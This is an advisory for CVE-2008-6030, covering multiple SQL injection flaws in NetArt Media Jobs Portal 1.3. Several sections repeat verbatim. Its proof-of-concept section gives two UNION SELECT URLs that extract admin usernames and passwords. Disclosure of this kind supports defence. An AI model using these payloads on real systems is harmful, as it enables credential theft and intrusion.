NetArt Media Jobs Portal Multiple SQL Injection Vulnerabilities
BID:31281
Info
NetArt Media Jobs Portal Multiple SQL Injection Vulnerabilities
| Bugtraq ID: | 31281 |
| Class: | Input Validation Error |
| CVE: |
CVE-2008-6030 |
| Remote: | Yes |
| Local: | No |
| Published: | Sep 21 2008 12:00AM |
| Updated: | May 07 2015 05:23PM |
| Credit: | Encrypt3d.M!nd |
| Vulnerable: |
NetArtMEDIA Jobs Portal 1.3 |
| Not Vulnerable: | |
Discussion
NetArt Media Jobs Portal Multiple SQL Injection Vulnerabilities
Jobs Portal is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied input before using it in an SQL query.
Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Jobs Portal 1.3 is vulnerable; other versions may also be affected.
Jobs Portal is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied input before using it in an SQL query.
Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Jobs Portal 1.3 is vulnerable; other versions may also be affected.
Exploit / POC
NetArt Media Jobs Portal Multiple SQL Injection Vulnerabilities
Attackers can use a browser to exploit these issues.
The following example URIs are available:
http://www.example.com/index.php?mod=search&job=-666 union select 1,2,3,4,5,username,password,8,9,10,11,12,13,14 from websiteadmin_admin_users
http://www.example.com//index.php?page_id=-1&news_id=-666 union select 1,2,username,password,5,6 from websiteadmin_admin_users
Attackers can use a browser to exploit these issues.
The following example URIs are available:
http://www.example.com/index.php?mod=search&job=-666 union select 1,2,3,4,5,username,password,8,9,10,11,12,13,14 from websiteadmin_admin_users
http://www.example.com//index.php?page_id=-1&news_id=-666 union select 1,2,username,password,5,6 from websiteadmin_admin_users
Solution / Fix
NetArt Media Jobs Portal Multiple SQL Injection Vulnerabilities
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
References
NetArt Media Jobs Portal Multiple SQL Injection Vulnerabilities
References:
References:
- Jobs Portal (NetArt Media)